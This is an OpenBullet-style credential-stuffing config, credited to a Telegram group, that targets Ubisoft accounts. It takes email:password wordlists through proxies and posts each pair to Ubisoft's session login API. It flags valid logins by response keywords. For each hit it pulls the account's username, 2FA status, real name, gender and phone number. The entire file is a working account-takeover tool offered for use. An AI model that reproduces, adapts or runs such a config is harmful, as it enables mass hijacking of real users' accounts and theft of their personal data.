[SETTINGS]
{
  "Name": "ubisoft api | xreactor.org",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-27T22:12:37.9560317+02:00",
  "AdditionalInfo": "for more configs :xreactor.org | @xreactor_team",
  "RequiredPlugins": [],
  "Author": "Telegram:@xreactor_team | @uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ubisoft api",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "base64" 

#LOGIN REQUEST POST "https://public-ubiservices.ubi.com/v3/profiles/sessions" 
  CONTENT "{\"rememberMe\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: public-ubiservices.ubi.com" 
  HEADER "Ubi-AppId: 2c2d31af-4ee4-4049-85dc-00dc74aef88f" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Basic <base64>" 
  HEADER "GenomeId: de726b45-417f-476f-a3ba-d0c032a9ef2e" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://overlay.cdn.ubisoft.com" 
  HEADER "Content-Length: 19" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials" 
    KEY "Email format is invalid." 
    KEY "Password is required" 
  KEYCHAIN Success OR 
    KEY "{\"platformType\":\"" 

#username PARSE "<SOURCE>" JSON "nameOnPlatform" CreateEmpty=FALSE -> CAP "username" 

#2fa PARSE "<SOURCE>" JSON "twoFactorAuthenticationTicket" CreateEmpty=FALSE -> CAP "2fa" 

PARSE "<SOURCE>" JSON "sessionId" -> VAR "1id" 

PARSE "<SOURCE>" JSON "ticket" -> VAR "ticket" 

REQUEST GET "https://public-ubiservices.ubi.com/v3/users/me" 
  
  HEADER "Host: public-ubiservices.ubi.com" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://overlay.cdn.ubisoft.com" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148" 
  HEADER "Authorization: ubi_v1 t=<ticket>" 
  HEADER "ubi-sessionid: <1id>" 
  HEADER "ubi-appid: 2c2d31af-4ee4-4049-85dc-00dc74aef88f" 

#firstName PARSE "<SOURCE>" JSON "firstName" CreateEmpty=FALSE -> CAP "firstName" 

#gender PARSE "<SOURCE>" JSON "gender" CreateEmpty=FALSE -> CAP "gender" 

#lastName PARSE "<SOURCE>" JSON "lastName" CreateEmpty=FALSE -> CAP "lastName" 

PARSE "<SOURCE>" JSON "phone" CreateEmpty=FALSE -> CAP "phone" 

#inactiveAccount PARSE "<SOURCE>" JSON "inactiveAccount" CreateEmpty=FALSE -> CAP "inactiveAccount" 

#author FUNCTION Constant "@uzzzzul | @xreactor_team" -> CAP "configby" 

